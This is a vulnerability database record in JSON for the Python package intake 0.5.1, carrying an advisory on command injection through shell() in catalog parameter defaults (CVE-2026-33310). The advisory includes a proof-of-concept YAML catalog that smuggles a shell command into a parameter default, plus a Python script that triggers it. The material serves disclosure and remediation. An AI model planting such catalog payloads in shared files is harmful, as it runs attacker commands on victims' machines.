{"url":"http://public2.vulnerablecode.io/api/packages/989341?format=json","purl":"pkg:pypi/intake@0.5.1","type":"pypi","namespace":"","name":"intake","version":"0.5.1","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90880?format=json","vulnerability_id":"VCID-45gd-75f4-kuan","summary":"Intake has a Command Injection via shell() Expansion in Parameter Defaults\n### Summary\nThe shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process.\nIf a catalog contains a parameter default such as shell(<command>), the command may be executed when the catalog source is accessed.\nThis means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system.\nThis behavior could potentially be classified as OS Command Injection / Unsafe Shell Expansion.\n\n### Details\nThe issue appears to originate from how parameter default values are expanded when a catalog source is accessed.\n\nDuring catalog loading and source access:\n\nIntake resolves parameter default values\nThe function responsible for expanding defaults processes the shell() syntax\nThe shell expression triggers a subprocess execution\nBecause this occurs during catalog evaluation, the command may execute before the user explicitly interacts with the dataset itself.\n\nAffected logic appears to involve:\n```\nexpand_defaults()\n```\nand related parameter parsing mechanisms.\n\n\n### PoC\nexploit.yaml\n```\nmetadata:\n  version: 1\nsources:\n  rce_test:\n    driver: csv\n    description: \"Testing shell expansion in parameters\"\n    args:\n      urlpath: \"{{ cmd_exec }}\"\n    parameters:\n      cmd_exec:\n        display_name: \"Test Parameter\"\n        type: str\n        default: \"shell(touch /tmp/intake_rce_test)\"\n```\n\nreproduce.py\n```\nimport intake\nimport os\n\nPROOF_FILE = \"/tmp/intake_rce_test\"\n\nif os.path.exists(PROOF_FILE):\n    os.remove(PROOF_FILE)\n\nprint(f\"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}\")\n\ntry:\n    cat = intake.open_catalog(\"exploit.yaml\")\n\n    print(\"Accessing source...\")\n    _ = cat[\"rce_test\"]\n\nexcept Exception as e:\n    print(f\" Error during execution: {e}\")\n\nif os.path.exists(PROOF_FILE):\n    print(f\" Command execution confirmed, Found: {PROOF_FILE}\")\nelse:\n    print(\"Command execution did not occur.\")\n```\n### Attack Scenario\nA potential attack scenario could be:\n\n1. An attacker publishes a malicious Intake catalog YAML file\n2. The victim downloads or loads the catalog\n3. The victim accesses a source entry in the catalog\n4. Parameter defaults are expanded\n5. The shell() expression triggers execution of the embedded command\n\n### Impact\n\nIf this behavior is confirmed to be unintended, an attacker could distribute a malicious catalog file via:\n\n- Git repositories\n- shared datasets\n- URLs\n- data science workflows\n- Any user loading the catalog could unknowingly execute commands with their local user privileges.\n\n### Recommendation\nPossible mitigations could include:\n\n- disabling shell() expansion by default\n- requiring an explicit opt-in flag (e.g., allow_shell=True)\n- restricting shell execution for catalogs loaded from untrusted sources\nPlease let me know if additional information or testing is needed.\nI'm happy to assist with further analysis or validation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33310","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10546","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10446","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10422","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10508","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10525","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33310"},{"reference_url":"https://github.com/intake/intake","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/intake/intake"},{"reference_url":"https://github.com/intake/intake/commit/d0c0b6b57c1cb3f73880655ded4a9b0e18e1fd1b","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-24T15:35:28Z/"}],"url":"https://github.com/intake/intake/commit/d0c0b6b57c1cb3f73880655ded4a9b0e18e1fd1b"},{"reference_url":"https://github.com/intake/intake/security/advisories/GHSA-37g4-qqqv-7m99","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-24T15:35:28Z/"}],"url":"https://github.com/intake/intake/security/advisories/GHSA-37g4-qqqv-7m99"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33310","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33310"},{"reference_url":"https://github.com/advisories/GHSA-37g4-qqqv-7m99","reference_id":"GHSA-37g4-qqqv-7m99","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-37g4-qqqv-7m99"}],"fixed_packages":[],"aliases":["CVE-2026-33310","GHSA-37g4-qqqv-7m99"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-45gd-75f4-kuan"}],"fixing_vulnerabilities":[],"risk_score":"4.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/intake@0.5.1"}